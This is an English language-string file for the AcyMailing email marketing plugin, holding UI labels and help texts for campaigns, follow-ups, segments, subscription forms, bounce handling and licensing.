ACYM_CATEGORIES_X_IN_X="One of the product categories %1$s in %2$s"
ACYM_PRODUCTS_X_IN_X="Product %1$s in %2$s"
ACYM_EVERY_PRODUCTS="Every product"
ACYM_ORDER_STATUS_X_IN_X="Order status %1$s in %2$s"
ACYM_EVERY_ORDER_STATUS="Every order status"
ACYM_X_PART_X_SEGMENT="The user %1$s part of the segment(s) %2$s"
ACYM_NO_CONDITION_SEGMENT="No condition on the segments"
ACYM_NO_CONDITION_USER_SUBSCRIPTION="No condition on the user's subscription"
ACYM_X_SUBSCRIBED_X_LIST="The user %1$s subscribed to %2$s"
ACYM_WOOCOMMERCE_CATEGORY_IN="Category %1$s in %2$s"
ACYM_WOOCOMMERCE_PRODUCT_IN="Product %1$s in %2$s"
ACYM_WOOCOMMERCE_ORDER_STATUS_IN="Order status %1$s in %2$s"
ACYM_IS_NOT="Is not"
ACYM_IS="Is"
ACYM_SEND_FOLLOW_UP_EMAIL_IF="Send follow-up email if:"
ACYM_FOLLOW_UP_CONDITION_DESC_2="You can leave conditions empty. But that means follow-up emails will be executed for every single user belonging to your trigger"
ACYM_FOLLOW_UP_CONDITION_DESC_1="Here you will be able to define some conditions. Emails will be sent only if the user matches these conditions"
ACYM_COULD_NOT_LOAD_DATA="Could not load data"
ACYM_FOLLOW_UP_CONDITION_USER_SEGMENT="User %1$s part of the segment(s) %2$s"
ACYM_FOLLOW_UP_CONDITION_USER_SUBSCRIBE="User %1$s subscribed to the list(s) %2$s"
ACYM_SUGGEST_IDEA="Suggest an idea"
ACYM_HAVE_SUGGESTION_DESC="Share it with us so that we can add it to our TODO list"
ACYM_HAVE_SUGGESTION="Have a suggestion?"
ACYM_HIKASHOP_PURCHASE="Hikashop purchase"
ACYM_WOOCOMMERCE_PURCHASE="WooCommerce purchase"
ACYM_TRIGGER="Trigger"
ACYM_WOOCOMMERCE_FOLLOW_UP_DESC="Trigger this follow-up when a user creates an order on WooCommerce"
ACYM_HIKASHOP_FOLLOW_UP_DESC="Trigger this follow-up when a user creates an order on Hikashop"
ACYM_USER_SUBSCRIBE_DESC="Trigger this follow-up when a new user subscribes"
ACYM_BIRTHDAY_MAIL_FOLLOW_DESC="Trigger this follow-up on user's birthday"
ACYM_NEW_FOLLOW_UP="New follow-up"
ACYM_FOLLOW_UP_DESC="Send a series of emails triggered on a user action"
ACYM_WHAT_TRIGGERS_FOLLOW_UP_SHOULD_START="Which triggers the follow-up process should start from?"
ACYM_USER_SUBSCRIBE="User subscribe"
ACYM_USER_CREATION_DESC="This follow-up campaign will be triggered when a user is created"
ACYM_COUNT_USER_WITH_SEGMENT_CAMPAIGN_SUMMARY="This is the total count of the AcyMailing users subscribed to your lists and matching your segment"
ACYM_CONDITION_WITH_LISTS_COUNT="This result represents the AcyMailing users subscribed to your chosen lists matching this condition"
ACYM_ADD_SEGMENT_STEP_IN_SEND_PROCESS_DESC="If you check <b>yes</b> a new tab <b>segment</b> will appear after you've saved and it will allow you to segment your lists"
ACYM_NUMBER_OF_ACYMAILING_USERS_MATCHING_CONDITIONS="Number of AcyMailing users matching these conditions:"
ACYM_BIRTHDAY_EMAIL="Birthday email"
ACYM_DELETE_CUSTOM_FIELDS_TYPE_DATE="If you delete a date field that is used in a birthday campaign, this campaign will be disabled."
ACYM_BIRTHDAY_FIELD="Birthday field %s"
ACYM_SEND_IT_BEFORE_USER_BIRTHDAY="Send it %1$s %2$s %3$s user's birthday"
ACYM_SPECIAL_MAIL_SENT_TO="Special mail will be sent to: "
ACYM_SEND_ORDER_PLACED_STATUS_CURRENTLY="Send it if the user placed an order %1$s %2$s ago and the order status is currently %3$s"
ACYM_ELEMENT_DELETED_LOG="%1$s %2$s removed by %3$s in:"
ACYM_SELECT_AN_EMAIL_FIRST="Please select an email first"
ACYM_TIMES="Times"
ACYM_WOOCOMMERCE_ABANDONED_CART_CAMPAIGN="WooCommerce abandoned cart campaign"
ACYM_WOOCOMMERCE_ABANDONED_CART="WooCommerce abandoned cart"
ACYM_BIRTHDAY="Birthday"
ACYM_BIRTHDAY_MAIL_DESC="Send an email some days/weeks/months before or after a user's birthday"
ACYM_WOOCOMMERCE_EMAIL_DESC="Send an email some days/weeks/months after an order was created and has a specific status"
ACYM_ONE_TIME_EMAIL="One time email"
ACYM_COOKIE_SETTINGS="Cookie settings"
ACYM_CAMPAIGN_DOESNT_EXISTS="The campaign does not exist"
ACYM_NEW_SEGMENT="New segment"
ACYM_PLEASE_FILL_A_NAME_FOR_YOUR_SEGMENT="Please fill a name for your segment or select some filters"
ACYM_SAVE_SEGMENT="Save segment"
ACYM_COULD_NOT_COUNT_USER="Could not count users"
ACYM_IF_YOU_SELECT_SEGMENT_FILTERS_ERASE="If you select this segment your filters will be erased"
ACYM_CREATE_NEW_SEGMENT_IN_CAMPAIGN="Create a new segment based on filters"
ACYM_SELECT_EXISTING_SEGMENT="Select an already existing segment"
ACYM_SELECT_SEGMENT="Select a segment"
ACYM_SEGMENT_CAMPAIGN_DESC="Here you can either choose a segment that you previously made or create a new one"
ACYM_YOU_DID_NOT_SELECT_LISTS="You didn't select any list for the moment"
ACYM_PREVIOUSLY_SELECTED_USERS="Previously selected users"
ACYM_PREVIOUSLY_SELECTED_LISTS="Previously selected lists"
ACYM_CHOSEN_LISTS_DESC="This is a summary of the previous step <b>Recipients</b> in which you choose the lists you want to send your campaign to"
ACYM_CHOSEN_LISTS="Chosen lists"
ACYM_SEGMENT="Segment"
ACYM_ADD_SEGMENT_STEP_IN_SEND_PROCESS="Add a <b>Segment</b> step in the send process"
ACYM_DELETE_THIS_FILTER="Delete this filter"
ACYM_PLEASE_SELECT_FILTERS="Please select filters before saving your segment"
ACYM_NO_USERS_SELECTED_YET_PLEASE_SELECT_FILTER="No user selected yet, please define some filters first"
ACYM_SEGMENT_WELL_SAVE="Segment well saved"
ACYM_COULD_NOT_SAVE_SEGMENT="Could not save this segment"
ACYM_SEGMENT_NAME="Segment name"
ACYM_COULD_NOT_FIND_SEGMENT="Could not find this segment"
ACYM_CREATE_FIRST_SEGMENTS="Create your first segment!"
ACYM_YOU_DONT_HAVE_ANY_SEGMENTS="You don't have any segment"
ACYM_SEGMENTS="Segments"
ACYM_LIST_DESCRIPTION="List description"
ACYM_LIST_DESCRIPTIONS="List descriptions"
ACYM_LANGUAGE_NOT_INSTALLED="The specified language &quot;%s&quot; is not installed on your site"
ACYM_LANGUAGE_CODE_NOT_FOUND="Language code not found"
ACYM_FILE_NOT_FOUND="File not found: %s"
ACYM_PAGE_NOT_FOUND="Page not found"
ACYM_INVALID_IMAGE="Invalid image"
ACYM_SUCCESS_MODE="Success message"
ACYM_SUCCESS_MODE_DESC="How should the success message be displayed? (This won't be applied if a redirection is set)"
ACYM_SUCCESS_REPLACE="Replace the form"
ACYM_SUCCESS_REPLACE_TEMP="Temporarily replace the form"
ACYM_SUCCESS_TOP_TEMP="Temporarily display above the form"
ACYM_SUCCESS_STANDARD="Display in the standard message area"
ACYM_NEW_PLUGIN_FORMAT="You installed the add-on %1$s, it has been converted into a WordPress plugin for wordpress.org rules compliancy. You can download the new plugin on %2$s"
ACYM_TRIGGER_WOOCOMMERCE_ORDER_CHANGE_SUMMARY="When a WooCommerce user order status changes from %1$s to %2$s"
ACYM_ON_WOOCOMMERCE_ORDER_CHANGE="When a WooCommerce user order status changes"
ACYM_COOKIE_EXPIRATION_DESC="The number of hours before the cookie expires"
ACYM_COOKIE_EXPIRATION="Cookie expiration"
ACYM_INCOME="Income"
ACYM_DO_NOT_REMIND_ME="Do not remind me"
ACYM_WOOCOMMERCE_TRACKING_INFO="Do you know that you can track your WooCommerce income made thanks to AcyMailing campaigns?"
ACYM_SELECT_A_PICTURE="Please select a picture"
ACYM_SETTINGS_AVAILABLE_INSTALLED_EXTENSION="Settings will only be available if the extension is installed"
ACYM_NO_PROFILE_MENU="You need to have an AcyMailing user profile menu to add a link to it"
ACYM_MODIFY_PROFILE_DESC="Insert a <b>Modify my profile</b> link in your email"
ACYM_MODIFY_MY_PROFILE="Modify my profile"
ACYM_VISIBLE_CAMPAIGN_DESC="This option allows you to display or not the campaign in the archive listing"
ACYM_TRANSLATE_CONTENT_DESC="Automatically translate content inserted in emails like posts when it is possible"
ACYM_TRANSLATE_CONTENT="Translate content"
ACYM_SHOW_HIDE="Show/Hide"
ACYM_ACCESS_DENIED="You don't have access to this page"
ACYM_CUSTOM="Custom"
ACYM_NON_EXISTING_PAGE="This page doesn't exist"
ACYM_ADVANCED_ACL_DESC="You can choose to give access to only a part of AcyMailing to your users with this option"
ACYM_ADVANCED_ACL="Advanced permissions"
ACYM_CONFIRMATION_EMAIL="Confirmation email"
ACYM_RESEND_CONFIRMATION_SUMMARY="Will receive the confirmation email again"
ACYM_RESEND_CONFIRMATION="Resend confirmation email"
ACYM_UNCONFIRMED_USERS="Unconfirmed users"
ACYM_LANGUAGE_DESC="Emails will be sent in this language if possible"
ACYM_LANGUAGE="Language"
ACYM_OK="Ok"
ACYM_SEE_FULL_CHANGELOG="See full changelog"
ACYM_USER_HISTORY_EMPTY="This user history is empty"
ACYM_YOU_DIDNT_SENT_EMAIL_USER="You didn't send any email to this user"
ACYM_USER_HISTORY="User history"
ACYM_EMAIL_HISTORY="Email history"
ACYM_SAVE_AS_TEMPLATE_CONFIRMATION="You are about to create a new template from this email, are you sure?"
ACYM_HORIZONTAL_PADDING_DESC="The horizontal padding will be applied between columns for the desktop view"
ACYM_VERTICAL_PADDING_DESC="The vertical padding is for the columns in mobile view, which are one below another"
ACYM_VERTICAL_PADDING="Vertical Padding"
ACYM_HORIZONTAL_PADDING="Horizontal Padding"
ACYM_TRACKING_WOOCOMMERCE_DESC="This option will allow you to know how many sales you make per email. Be careful as this option adds a cookie on the clicked links so don't forget to add it in your privacy policy!"
ACYM_UNKNOWN_SOCIAL="Unknown social media: %s"
ACYM_LISTS_CHECKED_DEFAULT_DESC="The selected lists will be checked by default on the subscription form if they are visible"
ACYM_COUND_NOT_INSTANCIATE_MAIL_FUCNTION="Your server failed to send the email"
ACYM_MAX_EXEC_TIME_GET_ERROR="Could not load the max execution time value : %s"
ACYM_SPECIFY_LANGUAGE="Specify a language"
ACYM_NO_DETAILED_STATS="No detailed statistics available for this email"
ACYM_RESET_TRANSLATION="You are about to remove the translation for the current language, are you sure?"
ACYM_REMOVE_TRANSLATION_DESC="Click here to remove this translation"
ACYM_REMOVE_LANG_CONFIRMATION="You removed the following languages: %s. All the related email translations will be deleted, are you sure?"
ACYM_ENTER_SUBJECT="The subject cannot be empty"
ACYM_MULTILINGUAL_CREATION_TITLE="No email version set for this language."
ACYM_MULTILINGUAL_CREATION_DESCRIPTION="Leave it this way if you want the default language email to be sent, or:"
ACYM_MULTILINGUAL_CREATION_FROM_DEFAULT="Copy content from default"
ACYM_MULTILINGUAL_CREATION_FROM_SCRATCH="New version from scratch"
ACYM_MULTILINGUAL_DESC="This email will be sent based on the user language. If the email isn't translated in this language, the version for the default language will be sent instead."
ACYM_DISPLAY_FIELDS_LABEL="Display the fields labels"
ACYM_DISPLAY_LISTS="Display the lists"
ACYM_HEADER_SUBFORM_DESC="Display the subscription form at the top of your screen"
ACYM_FOOTER_SUBFORM_DESC="Display the subscription form at the bottom of your screen"
ACYM_POPUP_SUBFORM_DESC="Display the subscription form in a popup and set it to be displayed based on specific conditions"
ACYM_SHORTCODE_SUBFORM_DESC="Put a shortcode wherever you want. It will be automatically replaced by the subscription form"
ACYM_MODULE="Module"
ACYM_WIDGET="Widget"
ACYM_MODULE_SUBFORM_DESC="Use the Joomla! default module"
ACYM_WIDGET_SUBFORM_DESC="Use the WordPress default widget"
ACYM_WHICH_KIND_OF_SUB_FORM_CREATE="What kind of subscription form would you like to create?"
ACYM_DEFAULT_LANGUAGE="Default language"
ACYM_DEFAULT_LANGUAGE_DESC="If the version of an email for a specific language doesn't exist, the version of this language will be taken instead"
ACYM_MULTILINGUAL_OPTIONS_PROMPT="Your site uses multiple languages, do you want to activate the multilingual options?"
ACYM_LANGUAGES_USED_DESC="Select the languages that will have a different version of your emails"
ACYM_LANGUAGES_USED="Languages used"
ACYM_MULTILINGUAL_EMAILS="Multilingual emails"
ACYM_MULTILINGUAL="Multilingual"
ACYM_TRANSLATIONS="Translations"
ACYM_FOOTER="Footer"
ACYM_NOT_ALLOWED_CREATE_TYPE_FORM="You need to have the Enterprise version to create this type of form"
ACYM_NEW_FORM="New form"
ACYM_SHORTCODE_COPY_PASTE="Please copy / paste this shortcode in your content to replace it by this subscription form"
ACYM_PLEASE_SAVE_FORM_TO_GET_SHORTCODE="Please save the form to get the shortcode"
ACYM_CHOOSE_IMAGE="Choose an image"
ACYM_CHANGE="Change"
ACYM_ALL_PAGES="All pages"
ACYM_HEADER="Header"
ACYM_SHORTCODE="Shortcode"
ACYM_CREATE_FIRST_FORM="Create your first one and allow your users to subscribe to your lists!"
ACYM_YOU_DONT_HAVE_ANY_SUBSCRIPTION_FORMS="You don't have any subscription forms"
ACYM_SUBSCRIPTION_FORMS="Subscription forms"
ACYM_PLEASE_FILL_FORM_NAME="Please fill the form name"
ACYM_FORM_WELL_SAVED="Form well saved"
ACYM_SOMETHING_WENT_WRONG_FORM_SAVING="Something went wrong while saving the subscription form"
ACYM_SOMETHING_WENT_WRONG_GENERATION_FORM="Something went wrong on the form generation"
ACYM_COULD_NOT_GET_FORM_INFORMATION="Could not get form information"
ACYM_POPUP="Popup"
ACYM_BORDER_SIZE="Border size"
ACYM_OUTSET="Outset"
ACYM_INSET="Inset"
ACYM_RIDGE="Ridge"
ACYM_GROOVE="Groove"
ACYM_DOUBLE="Double"
ACYM_DASHED="Dashed"
ACYM_DOTTED="Dotted"
ACYM_SOLID="Solid"
ACYM_BORDER_TYPE="Border type"
ACYM_BORDER_COLOR="Border color"
ACYM_TEXT_COLOR="Text color"
ACYM_DELAY_DESC="Number of seconds to wait before displaying the popup"
ACYM_DELAY="Delay"
ACYM_PAGE_SELECTION_DESC="Select the pages where you want to display this subscription form"
ACYM_PAGE_SELECTION="Page selection"
ACYM_FORM_NAME="Form name"
ACYM_SHOW_FILTERS="Show filters"
ACYM_HIDE_FILTERS="Hide filters"
ACYM_TAG="Tag"
ACYM_SUBSCRIPTION_STATUS="Subscription status"
ACYM_TRACK_THIS_CAMPAIGN="Track this campaign"
ACYM_TRACK_THIS_CAMPAIGN_DESC="If this option is disabled, the open and click statistics won't be tracked for this campaign"
ACYM_TRACK_THIS_LIST="Track this list"
ACYM_TRACK_THIS_LIST_DESC="If this option is disabled, the open and click statistics won't be tracked for this list"
ACYM_TRACK_THIS_USER="Track this user"
ACYM_TRACK_THIS_USER_DESC="If this option is disabled, the open and click statistics won't be tracked for this user"
ACYM_DONT_APPLY_STYLE_TAG_A="Don't apply 'a' tag style settings"
ACYM_GIPHY_LOW_RES_TEXT="GIFs will be previewed in low-resolution in this modal for performance reasons, but they will be inserted in high-resolution in your email"
ACYM_GIPHY="Giphy"
ACYM_COULD_NOT_LOAD_GIF_TRY_FEW_MINUTES="Could not load GIFs from Giphy, please try again in few minutes"
ACYM_SEARCH_GIFS="Search GIFs"
ACYM_INSERT_GIF="Insert GIF"
ACYM_SEARCH_FOR_GIFS="Search for GIFs..."
ACYM_APPLY_FILTERS="Apply filters"
ACYM_CLEAR_FILTERS="Clear all filters"
ACYM_NOT_CONFIRMED="Not confirmed"
ACYM_CUSTOM_VIEW_DESC="This feature allows to customize/override the way the content will be displayed in the emails. The custom view will have priority on display options in editor. HTML experts only"
ACYM_END_DATE_SIMPLE="End date simple"
ACYM_START_DATE_SIMPLE="Start date simple"
ACYM_START_DATE="Start date"
ACYM_ASSIGN_COLUMN_TO_FIELD="Assign the column %s to a field"
ACYM_DUPLICATE_X_FOR_X="Duplicate field &quot;%1$s&quot; for the column %2$s"
ACYM_ASSIGN_EMAIL_COLUMN="Please assign a column for the e-mail field"
ACYM_FILL_ALL_INFORMATION="Please fill all information"
ACYM_ONLY_IN_STOCK="Only insert products in stock"
ACYM_PRICE_WITH_TAX="Price with tax"
ACYM_HIDE_PAST_EVENTS="Hide past events"
ACYM_MENU_ID="Menu ID"
ACYM_DONT_SHOW="Don't show this content insertion option"
ACYM_ONLY_AUTHORS_ELEMENTS="Display the current user's elements"
ACYM_ALL_ELEMENTS="Display all elements"
ACYM_FRONT_ACCESS="Front-end access"
ACYM_IMAGE_HTML_TAG="HTML tag image"
ACYM_LINK_DOWNLOAD="Link download"
ACYM_CUSTOM_VIEW_NOT_FOUND="Custom view not found"
ACYM_DYNAMIC_CONTENT_DESC="If your custom view doesn't have any tags (for example {title} to display the title of your article) we will display the default layout"
ACYM_DYNAMIC_CONTENT="Dynamic content"
ACYM_NEED_PRO_VERSION="You need a Pro version to see the results"
ACYM_CONDITION_X_FIELD_SUMMARY="Has the %1$s field %2$s %3$s %4$s"
ACYM_BY_GROUP="By group"
ACYM_NEED_ENTERPRISE_VERSION="You need the Enterprise version to see the results"
ACYM_REGISTRATION_DATE="Registration date of the user"
ACYM_MAIL_FIELD_CONTACT="Email field to use"
ACYM_INSERT_CONTACTFORM_TAG="Generate a form-tag for an AcyMailing subscription."
ACYM_FILE_SIZE="File size"
ACYM_FILE_TYPE="File type"
ACYM_GET_ENTERPRISE_VERSION="Get Enterprise version"
ACYM_CUSTOM_VIEW_WELL_DELETED="Custom view well deleted"
ACYM_COULD_NOT_DELETE_CUSTOM_VIEW="Could not delete the custom view"
ACYM_RESET_VIEW_CONFIRM="If you reset the custom view of this add-on, the file will be deleted and all modifications will be lost. Are you sure?"
ACYM_RESET_VIEW="Reset view"
ACYM_CUSTOM_VIEW_SAVED_FAILED="Failed to save custom view"
ACYM_EDIT_CUSTOM_VIEW="Edit custom view"
ACYM_SENDING_TYPE="Sending type"
ACYM_THIS_CAMPAIGN_NOT_BEING_TRACKED="This campaign is not being tracked"
ACYM_THIS_CAMPAIGN_BEING_TRACKED="This campaign is being tracked"
ACYM_CUSTOM_VIEW="Custom view"
ACYM_CUSTOM_VIEW_WELL_SAVED="Custom view well saved"
ACYM_CUSTOM_VIEW_FOR_X="Custom view for %s"
ACYM_COULD_NOT_SAVE_SETTINGS="Could not save the settings"
ACYM_BY_TAG="By tag"
ACYM_YOU_DONT_HAVE_EMAIL_FIELD_OR_EMAIL_FIELD_EMPTY="The email field is empty or there is no email field in this form"
ACYM_ACYMAILING_LISTS="AcyMailing Lists"
ACYM_IMPORT_CMS_GROUPS_DESC="Leave empty if you want to import all users, regardless of the group"
ACYM_CHANGES_PLEASE_SAVE="Some changes have been made, please save to see them"
ACYM_BOUNCES_REGEX_DESC="Tricky part. You should keep the default ones created by Acyba.<br />Except if you're kind of a superhero!<br />Here you should define which regular expression found in the email part will trigger the actions defined below."
ACYM_BOUNCES_ACTION_USER_DESC="Actions applied on the user we have sent the email to."
ACYM_BOUNCES_ACTION_MSG_DESC="Actions applied on the email we are handling."
ACYM_APPLIED_ON="Applied on"
ACYM_BOUNCE_RULE_CONDITION="Bounce rule conditions"
ACYM_MAXIMUM_CHARACTERS_TOOLTIP="Set 0 or leave empty if you don't want to set a maximum number of characters"
ACYM_MAXIMUM_CHARACTERS="Maximum characters"
ACYM_VALUES_FROM_DB="Load custom field values from a database table"
ACYM_FIELD_CONTENT="Field content"
ACYM_FIELD_STYLE="Field style"
ACYM_FIELD_VALUES="Field values"
ACYM_FIELD_PROPERTIES="Field properties"
ACYM_WHY_USING_CUSTOM_FIELDS="Why use custom fields?"
ACYM_WHY_USING_CUSTOM_FIELDS_DESC="To stop sending unwanted content and make people unsubscribe or complain about what they have received.<br />Why sending them information about the next Google product if they are Apple fans?<br />Stop wasting your time (and money) and use these fields to filter who would be interested by what you're going to send them.<br /><br />It also allows to insert custom information in your emails: <br />&quot; Hey <b>_username_</b>,<br />We know <b>_userchildname_</b> loves all these sports <b>_favoritessports_</b> so that's why we decided to inform you that...&quot; "
ACYM_WHAT_ARE_CUSTOM_FIELDS="What are custom fields?"
ACYM_WHAT_ARE_CUSTOM_FIELDS_DESC="What if you would like to store extra information about your users? <br /> Favourite football club, hobbies, astrological sign, favourite brand and so on...<br /><br />Definitely something interesting right?<br />There is no better thing than knowing as much as possible people who subscribed to your newsletters."
ACYM_CREATE_WELCOME_MAIL="Create welcome email"
ACYM_CREATE_UNSUBSCRIBE_MAIL="Create unsubscribe email"
ACYM_YOU_DONT_HAVE_ACCESS_TO_THIS_LIST="You don't have access to this list"
ACYM_LIST_ACCESS_DESC="If you allow your site's users to manage their own lists, you can give them access to this list with this option by selecting the user groups"
ACYM_LIST_ACCESS="List access"
ACYM_MANAGE_SUBSCRIBERS="Manage subscribers"
ACYM_NOTHING_TO_SHOW_HERE_RIGHT_PANEL="Nothing to show here. You don't have any elements yet, all the elements have been selected in the right panel"
ACYM_PLEASE_CLICK_ON_THE_LEFT_PANEL="Please click on a left panel element to select it"
ACYM_MANAGE_SUBSCRIPTION="Manage subscription"
ACYM_SELECT_AN_EMAIL="Select an email"
ACYM_OVERVIEW="Overview"
ACYM_DEFAULT_TEMPLATES_ALREADY_INSTALL="Default templates already installed, delete them if you want to install them again"
ACYM_EMAIL_CUSTOM_HEADERS_DESC="The custom headers allow you to add html content in the head tag of your email. Only add something if you are sure what you're doing otherwise this could break your email."
ACYM_NO_MORE_RESULTS="No more results"
ACYM_DISPLAY_PICTURES="Pictures"
ACYM_DIMENSIONS="Dimensions"
ACYM_IMPORT_CMS_GROUPS="Only import users of the following groups"
ACYM_TEST_NOTE_PLACEHOLDER="Type a message to inform recipient(s) that it's a test"
ACYM_TEST_NOTE="Test note"
ACYM_TEMPLATE_ACCESS_DESC="If you allow your site's users to manage their own users and emails, you can give them access to this template with this option by selecting the user groups"
ACYM_TEMPLATE_ACCESS="Allowed groups"
ACYM_VIEW_ALL_EMAILS="View all emails"
ACYM_SELECT_ONE_OR_MORE_LIST="Select one or more lists"
ACYM_ONLY_AVAILABLE_ESSENTIAL_VERSION="Only available in our Essential version"
ACYM_ONLY_AVAILABLE_ENTERPRISE_VERSION="Only available in our Enterprise version"
ACYM_WHICH_KIND_OF_MAIL_CREATE="Which kind of mail do you want to create?"
ACYM_SCHEDULED_CAMPAIGN_DESC="Create your campaign, schedule it in the future, switch off your computer and relax"
ACYM_AUTOMATIC_CAMPAIGN_DESC="Send newsletter every day/week/month with dynamic content into it"
ACYM_UNSUBSCRIBE_EMAIL_DESC="Send an email when someone unsubscribe from your list"
ACYM_WELCOME_EMAIL_DESC="Send an email when someone subscribe to your list"
ACYM_CLASSIC_CAMPAIGN_DESC="Choose your template, insert your content, send it to your users. As simple as that"
ACYM_SCHEDULED_CAMPAIGN="Scheduled campaign"
ACYM_AUTOMATIC_CAMPAIGN="Automatic Campaign"
ACYM_UNSUBSCRIBE_EMAIL="Unsubscribe Email"
ACYM_WELCOME_EMAIL="Welcome Email"
ACYM_CLASSIC_CAMPAIGN="Classic Campaign"
ACYM_PRESELECT_DESC="This option is preselected depending on the choice you've made in the first step"
ACYM_NEXT_TRIGGER="Next trigger"
ACYM_LAST_GENERATION="Last generation"
ACYM_ERROR_WHILE_RECOVERING_TRIGGERS="Error while recovering the campaigns triggers"
ACYM_YOU_DONT_HAVE_ANY_X="You don't have any %s"
ACYM_CREATE_NEW_EMAIL="Create new email"
ACYM_EMAILS="Emails"
ACYM_UNSUBSCRIBE_EMAILS="Unsubscribe emails"
ACYM_WELCOME_EMAILS="Welcome emails"
ACYM_AUTOMATICS_CAMPAIGNS="Automatic campaigns"
ACYM_TEMPLATE_DUPLICATE_ERROR="Could not duplicate the template: template not found"
ACYM_REPORT_DESC="The report of the last cron call, showing what automatic actions have been made"
ACYM_CRON_TRIGGERED_IP_DESC="IP address of the last source that called your site's cron URL, to trigger the automatic features of AcyMailing"
ACYM_RESUBSCRIBE_ALL="Re-subscribe to all"
ACYM_LETS_GO="Let's go!"
ACYM_WHAT_IS_BOUNCE_HANDLING="What is bounce handling?"
ACYM_WHAT_IS_BOUNCE_HANDLING_TEXT="This icon is the best one to illustrate the bounce process.<br />In fact, you already know what it is. &quot;Delivery Status Notification (Failure)&quot; you know it right?<br />In short, sometimes, after sending an email, you receive one saying your message hasn't been delivered for some reason.<br />Vacation/Auto-reply message, your email has been blocked by the recipient email server, receiver email address doesn't exist and so on..."
ACYM_WHAT_ARE_THE_RISKS_BOUNCES="What are the risks?"
ACYM_WHAT_ARE_THE_RISKS_BOUNCES_TEXT="You will start being considered as SPAM by mail servers as you're getting too many bounce emails.<br />If you don't optimize this then your emails won't be received anymore. That's that simple!"
ACYM_HOW_ACYMAILING_CAN_HELP="How AcyMailing can help?"
ACYM_HOW_ACYMAILING_CAN_HELP_TEXT="Bounce handling feature allows to stop sending emails to invalid recipients and stop receiving bounces to not be considered as SPAM.<br />Here are some actions you will be able to define:<br /> - Delete a user from your receivers when its email address doesn't exist <br /> - Forward the message to your email address when it is a Vacation/Auto-Reply message <br /> - Unsubscribe users from the list <br /> - So many more ..."
ACYM_CURL_ERROR_MESSAGE="Curl error message: %s"
ACYM_COULD_NOT_UPLOAD_CSV_FILE="Could not upload this csv file"
ACYM_AND_MANY_MORE_FEATURE_YOU_MISSING="And many more features you're probably missing. What are you waiting for?"
ACYM_FILTER_USERS_BASE_ON_FIELDS_DATA="Filter users based on fields data and many more..."
ACYM_SEND_DYNAMIC_NEWSLETTER="Send dynamic newsletters Hello [first name]"
ACYM_BIRTHDAY_PHONE_CITY="Birthdate, phone number, city, country, favourite brand and so on."
ACYM_ADD_ADDITIONAL_INFORMATION_TO_USER="Add additional information to your user profiles."
ACYM_CHECK_IF_YOU_CAN_SEND_IT_SAFELY="Check if you can send it safely or if you need to improve it a bit to make sure your users will receive it"
ACYM_IS_YOUR_CAMPAIGN_CONSIDERED_IN_SPAM="Is your campaign going to be received or considered as SPAM?"
ACYM_CAMPAING_QUALITY_TEST="Campaign quality tests"
ACYM_ASSIGN_ACY_WEBSITE_TO_LICENCE_AND_MAGIC="Subscribe, assign your website to your license and let AcyMailing do some magic."
ACYM_IN_OUR_PRO_VERSION_DONE_AUTOMATICALLY="In our pro versions, everything is automatically executed."
ACYM_ACY_FREE_DOESNT_NOTHING_DONE_AUTOMATICALLY="Using AcyMailing Free version, there is nothing done automatically, everything needs to be done manually."
ACYM_YOU_HAVE_FREE_VERSION_DISPLAY_FEATURES="As you're running the free version we will simply display some features which are available in these versions."
ACYM_SECTION_FOR_OUR_PRO_USERS="This section is for users using one of our pro versions."
ACYM_COME_ONE_NOT_SPEAKING_ABOUT_CAMERA="Come on, we're not talking about your favourite camera..."
ACYM_GO_PRO="Go Pro!"
ACYM_NEVER="Never"
ACYM_LAST_RUN_DESC="The date of the last time the cron URL has been called by a cron service."
ACYM_EMAIL_LANGUAGE_DESC="Your site will be loaded with the specified language when clicking on dynamic links inserted in your email, such as unsubscribe links or links of inserted articles"
ACYM_EMAIL_LANGUAGE="Language assigned to this email"
ACYM_INSERT_DYNAMIC_TEXT="Insert dynamic text"
ACYM_GET_PRO_VERSION="Get Pro version"
ACYM_SEE_MORE="See more"
ACYM_GENERATE_NAME_DESC="The name will be generated from the first part of the email address. Numbers and some special characters will be removed."
ACYM_IMPORT_TEXT_DESC="You can use the first line to define the column names. Use one line per user to import and separate each data with a comma. Here is an example:"
ACYM_IMPORT_DATABASE="Import from database"
ACYM_IMPORT_CMS_USERS="Import %s users"
ACYM_ACCESS_DESC="By default only the administrators have access to AcyMailing. The users having one of the selected roles will also have access to it when connected"
ACYM_ACCESS="Allow these user groups to access AcyMailing"
ACYM_PERMISSIONS="Permissions"
ACYM_JOOMLA_PERMISSIONS="Joomla permissions"
ACYM_TOTAL_CLICK="Total click"
ACYM_CHOOSE_EXISTING_DESC="This will create a copy of the selected email for this automation"
ACYM_DISPLAY_FORM_ON_ULTIMATE_MEMBER="Add the AcyMailing subscription form on your Ultimate Member registration page"
ACYM_ADD_DEFAULT_TMPL="Add default templates"
ACYM_REQUEST_FAILED_TIMEOUT="Request failed for timeout"
ACYM_CRON_LINK_DESC="The cron link is the link called by our server to trigger the automatic process on your website. This means if you click on it you can trigger the cron on your AcyMailing."
ACYM_CRON_LINK="Cron link"
ACYM_CANT_UNLINK_WEBSITE_LICENSE_DONT_MATCH="The website you're trying to unlink is not attached to this license key"
ACYM_SEND_PROCESS_FREQUENCY="Send process frequency"
ACYM_1_HOUR="1 hour"
ACYM_30_MINUTES="30 minutes"
ACYM_15_MINUTES="15 minutes"
ACYM_AUTOMATIC_SEND_PROCESS_DESC="If you enabled the automatic send process this means you can send scheduled campaigns or the automation will be trigger"
ACYM_DEACTIVATE_IT="Deactivate it"
ACYM_ACTIVATE_IT="Activate it"
ACYM_ACTIVATED="Activated"
ACYM_DEACTIVATED="Deactivated"
ACYM_AUTOMATIC_SEND_PROCESS="Automatic send process:"
ACYM_AUTOMATIC_SEND_PROCESS_NOT_ENABLED="Could not set the automatic send for this website, please contact us for more information"
ACYM_AUTOMATIC_SEND_PROCESS_WELL_DEACTIVATED="The automatic send process has been deactivated on this website"
ACYM_AUTOMATIC_SEND_PROCESS_WELL_ACTIVATED="The automatic send process has been activated on this website"
ACYM_ERROR_WHILE_UNLINK_LICENSE="An error occurred while the process on acymailing.com"
ACYM_LICENSE_UNLINK_SUCCESSFUL="Your license has been successfully unlinked from this website"
ACYM_YOU_REACH_THE_MAX_SITE_ATTACH="You've reached the maximum number of websites attached to your multisite license (max 20 sites)"
ACYM_LICENSE_ALREADY_ATTACH="Your license is already attached to another website, please go to acymailing.com to manage your licenses"
ACYM_ISSUE_WHILE_ATTACHING_LICENSE="An error occurred while attaching your license to your website, please contact us for more information"
ACYM_LICENSE_WELL_ATTACH="Your license is well attached to this website"
ACYM_LICENSE_NOT_FOUND="License not found"
